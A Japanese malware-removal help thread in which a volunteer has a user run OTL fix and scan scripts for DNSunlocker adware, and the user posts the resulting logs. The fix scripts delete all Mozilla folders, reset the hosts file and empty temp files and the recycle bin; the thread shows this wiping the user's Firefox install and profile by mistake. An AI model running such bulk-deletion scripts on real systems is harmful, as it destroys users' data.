:Files
%userprofile%\AppData\Local\Mozilla
%appdata%\Mozilla
%programdata%\Mozilla
%programfiles(x86)%\Mozilla Firefox
:Commands
[purity]
[resethosts]
[emptyflash]
[emptyjava]
[emptytemp]
[createrestorepoint]
[reboot]
------コピペこの上まで------

コピペが完了しましたら、分かりやすいお名前をつけて保存してください。
その後、PCをセーフモードで起動させてください。
再度OTLを起動させ、Custom Scan/Fixesの項目内に上記で保存した内容をコピペしてください。
今回は駆除作業のため、その他のチェック項目はありません。
赤い文字の[Run Fix]をクリックして処置を開始してください。
OTLの処置に従って進めてゆき、通常モードで再起動を行う前後いずれかに処置ログが表示されますので、
そちらのログを貼り付けてご連絡ください。
  • IVNO
  • MAIL
  • 2015/09/12 (Sat) 23:58:16
返信フォームへ 
Re: DNSunlockerの感染
お早い返答感謝です。

>これは酷い
そこまで酷い状態でしたか…(笑)
choromeに続いてfire foxにまで感染が確認されましたがieの方は大丈夫でしょうか?

ともあれ作業は終わりましたのでOTLのログを貼ります。


All processes killed
========== FILES ==========
C:\Users\【ユーザー名】\AppData\Local\Mozilla\updates folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Extensions folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla folder moved successfully.
C:\ProgramData\Mozilla\logs folder moved successfully.
C:\ProgramData\Mozilla folder moved successfully.
File/Folder C:\Program Files (x86)\Mozilla Firefox not found.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYFLASH]

User: All Users

User: Default
->Flash cache emptied: 57311 bytes

User: Default User
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Flash cache emptied: 59994 bytes

User: Public

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: All Users

User: Default

User: Default User

User: 【ユーザー名】
->Java cache emptied: 0 bytes

User: Public

Total Java Files Cleaned = 0.00 mb


[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Temp folder emptied: 152808094 bytes
->Temporary Internet Files folder emptied: 103997577 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 357293226 bytes
->Flash cache emptied: 0 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1365381666 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 43308949 bytes
RecycleBin emptied: 87819123 bytes

Total Files Cleaned = 2,013.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 09132015_014108

Files\Folders moved on Reboot...
C:\Users\【ユーザー名】\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
File\Folder C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C\Users\【ユーザー名】\AppData\Roaming\Dropbox\shellext \l\5429c4da not found!
File\Folder C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C\Users\【ユーザー名】\AppData\Roaming\Dropbox\shellext \l\5429c4e0 not found!

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • あすとろ
  • 2015/09/13 (Sun) 01:55:36
返信フォームへ 
Firefoxを入れなおして再度OTLのログ取得を
Firefoxが通常の方法ではOTLで処置できなかったため、
急遽このような手順で対応いただきましたが、
ここでFirefoxの入れなおしを行いましょう。
https://www.mozilla.org/ja/firefox/new/
入れなおしが完了しましたら、改めて同じ手順でOTLのログ取得をお願いいたします。
  • IVNO
  • MAIL
  • 2015/09/13 (Sun) 03:46:26
返信フォームへ 
Re: DNSunlockerの感染
再インストールが終わりましたのでログを貼ります。


All processes killed
========== FILES ==========
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\thumbnails folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\startupCache folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\safebrowsing folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\cache2\entries folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\cache2\doomed folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\cache2 folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\webapps folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\moz-safe-about+home\idb folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\moz-safe-about+home folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\chrome\idb\2918063365piupsah.files folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\chrome\idb folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\chrome folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\sessionstore-backups folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\minidumps folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\healthreport folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\gmp folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\datareporting folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\crashes\events folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\crashes folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\bookmarkbackups folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Crash Reports\events folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Crash Reports folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Extensions folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla folder moved successfully.
File/Folder C:\ProgramData\Mozilla not found.
C:\Program Files (x86)\Mozilla Firefox\webapprt folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\uninstall folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1 folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\dictionaries folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\defaults\pref folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\defaults folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\components folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox folder moved successfully.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYFLASH]

User: All Users

User: Default
->Flash cache emptied: 0 bytes

User: Default User
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Flash cache emptied: 0 bytes

User: Public

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: All Users

User: Default

User: Default User

User: 【ユーザー名】
->Java cache emptied: 0 bytes

User: Public

Total Java Files Cleaned = 0.00 mb


[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Temp folder emptied: 163556 bytes
->Temporary Internet Files folder emptied: 33191 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 382393871 bytes
->Flash cache emptied: 0 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 15295 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 143553 bytes

Total Files Cleaned = 365.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 09132015_165735

Files\Folders moved on Reboot...
C:\Users\【ユーザー名】\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • あすとろ
  • 2015/09/13 (Sun) 17:02:41
返信フォームへ 
それはFirefoxの削除手順です
そちらの作業を行うと、Firefoxを根こそぎ削除することにないます。
実際に根こそぎ削除されていますので、今一度Firefoxの入れなおしをお願いいたします。
そちらではなくこちらの手順です。

以下のソフトウェアをご準備ください。

OldTimer Listit(通称:OTL)
http://oldtimer.geekstogo.com/OTL.exe
直リンクです。デスクトップ等、分かりやすい場所に保存してください。
削除する際は起動後に「Cleanup」ボタンを押すことにより、自動的に削除されます。

OTLを起動させる前にブラウザを含め、可能な限りのソフトウェアを終了させてください。
ソフトウェアの終了が完了しましたら、OTLを起動させてください。
表示画面上部中央にあるScan All Usersにチェックを入れてください。
設定が完了しましたら、Custom Scan/Fixesの項目内に以下をコピペしてください。

------コピペこの下より------
SHOWHIDDEN
%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
ACTIVEX
CREATERESTOREPOINT
------コピペこの上まで------

コピペが完了しましたら、Run Scanをクリックしてスキャンを行ってください。
スキャン完了まで数分程度かかりますので、今しばらくお待ちください。
スキャンが完了しましたら、OTLを保存した場所と同じところに、
OTL.txtとExtras.txtが出力されますので、そちらを貼り付けてご連絡ください。
なお、OTLはその特性上、非常に長文となります。
こちらの掲示板の文字数上限がひらがな換算で約3万文字、英数字換算で約6万文字です。
確実に文字数オーバーとなりますので、余裕を見て5万5千文字程度になるように、
以下のURLの文字数カウンター等で確認しつつ、ログを分割されてご連絡ください。
http://www2u.biglobe.ne.jp/~yuichi/rest/strcount.html
  • IVNO
  • MAIL
  • 2015/09/13 (Sun) 17:37:02
返信フォームへ 
OTL1
勘違いと返信が遅くなりすみません…

早速ですがログを貼ります。

OTL logfile created on: 2015/09/14 16:45:26 - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\【ユーザー名】\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.84 Gb Total Physical Memory | 2.31 Gb Available Physical Memory | 60.25% Memory free
7.68 Gb Paging File | 6.16 Gb Available in Paging File | 80.24% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 447.66 Gb Total Space | 112.84 Gb Free Space | 25.21% Space Free | Partition Type: NTFS

Computer Name: 【ユーザー名】 | User Name: 【ユーザー名】 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
PRC - [2015/09/06 10:28:08 | 055,175,056 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
PRC - [2015/09/06 10:28:08 | 001,378,192 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
PRC - [2015/09/06 10:28:08 | 000,840,080 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
PRC - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
PRC - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2012/03/27 21:17:04 | 000,988,456 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
PRC - [2012/03/23 18:33:48 | 000,419,408 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMutilps32.exe
PRC - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe
PRC - [2012/03/23 18:33:46 | 000,343,632 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMworker.exe
PRC - [2012/03/23 18:33:44 | 001,105,488 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LManager.exe
PRC - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
PRC - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe
PRC - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
PRC - [2012/01/05 14:21:44 | 000,296,984 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2015/01/20 22:35:44 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2012/01/05 14:22:36 | 000,465,344 | ---- | M] () -- C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll
MOD - [2011/06/09 18:31:54 | 000,026,736 | ---- | M] () -- C:\Program Files (x86)\Janetter2\bin\SendWheel.dll


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/06/02 17:35:47 | 011,086,056 | ---- | M] (DisplayLink Corp.) [Auto | Running] -- C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe -- (DisplayLinkService)
SRV:[b]64bit:[/b] - [2015/05/26 03:19:13 | 001,255,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\diagtrack.dll -- (DiagTrack)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2014/01/27 08:37:08 | 000,185,792 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:[b]64bit:[/b] - [2014/01/27 08:31:12 | 000,219,752 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,048,128 | ---- | M] (Broadcom Corporation) [Auto | Running] -- C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE -- (wltrysvc)
SRV:[b]64bit:[/b] - [2012/02/22 13:21:16 | 000,199,272 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe -- (McShield)
SRV:[b]64bit:[/b] - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe -- (Live Updater Service)
SRV:[b]64bit:[/b] - [2012/02/02 22:29:52 | 000,628,448 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV:[b]64bit:[/b] - [2012/01/20 16:15:14 | 000,149,504 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TurboBoost\TurboBoost.exe -- (TurboBoost)
SRV:[b]64bit:[/b] - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2015/09/06 10:28:08 | 000,840,080 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2015/08/26 21:46:30 | 000,149,160 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/08/12 03:06:17 | 000,269,000 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/08/03 12:47:10 | 002,545,512 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2015/08/03 12:13:12 | 000,417,552 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc)
SRV - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe -- (chromoting)
SRV - [2015/07/24 08:23:38 | 000,838,336 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2015/07/09 13:14:04 | 000,327,296 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2015/01/29 05:13:13 | 001,910,128 | ---- | M] (Electronic Arts) [On_Demand | Stopped] -- C:\Program Files (x86)\Origin\OriginClientService.exe -- (Origin Client Service)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/08 10:00:02 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2012/04/23 13:25:32 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) [Auto | Running] -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe -- (DsiWMIService)
SRV - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe -- (GREGService)
SRV - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) [Auto | Running] -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe -- (NTI IScheduleSvc)
SRV - [2011/06/21 12:55:04 | 000,173,424 | ---- | M] (Egis Technology Inc. ) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe -- (EgisTec Ticket Service)
SRV - [2010/06/01 15:31:28 | 002,804,568 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/06/16 20:38:51 | 000,030,264 | ---- | M] (Disc Soft Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dtlitescsibus.sys -- (dtlitescsibus)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,441,064 | ---- | M] (DisplayLink Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dlkmd.sys -- (dlkmd)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,018,664 | ---- | M] (DisplayLink Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\dlkmdldr.sys -- (dlkmdldr)
DRV:[b]64bit:[/b] - [2015/03/04 19:34:52 | 000,124,568 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2014/01/27 08:43:26 | 000,070,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:[b]64bit:[/b] - [2014/01/27 08:37:32 | 000,344,688 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:[b]64bit:[/b] - [2014/01/27 08:33:26 | 000,783,864 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:[b]64bit:[/b] - [2014/01/27 08:31:34 | 000,520,696 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:[b]64bit:[/b] - [2014/01/27 08:30:06 | 000,311,600 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:[b]64bit:[/b] - [2014/01/27 08:29:22 | 000,180,272 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:[b]64bit:[/b] - [2013/10/15 17:50:00 | 000,169,720 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mkd3kfnt.sys -- (Mkd3kfNt)
DRV:[b]64bit:[/b] - [2013/10/02 11:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 004,746,304 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,022,592 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcm42rly.sys -- (BCM42RLY)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:13 | 000,021,568 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcmvwl64.sys -- (BcmVWL)
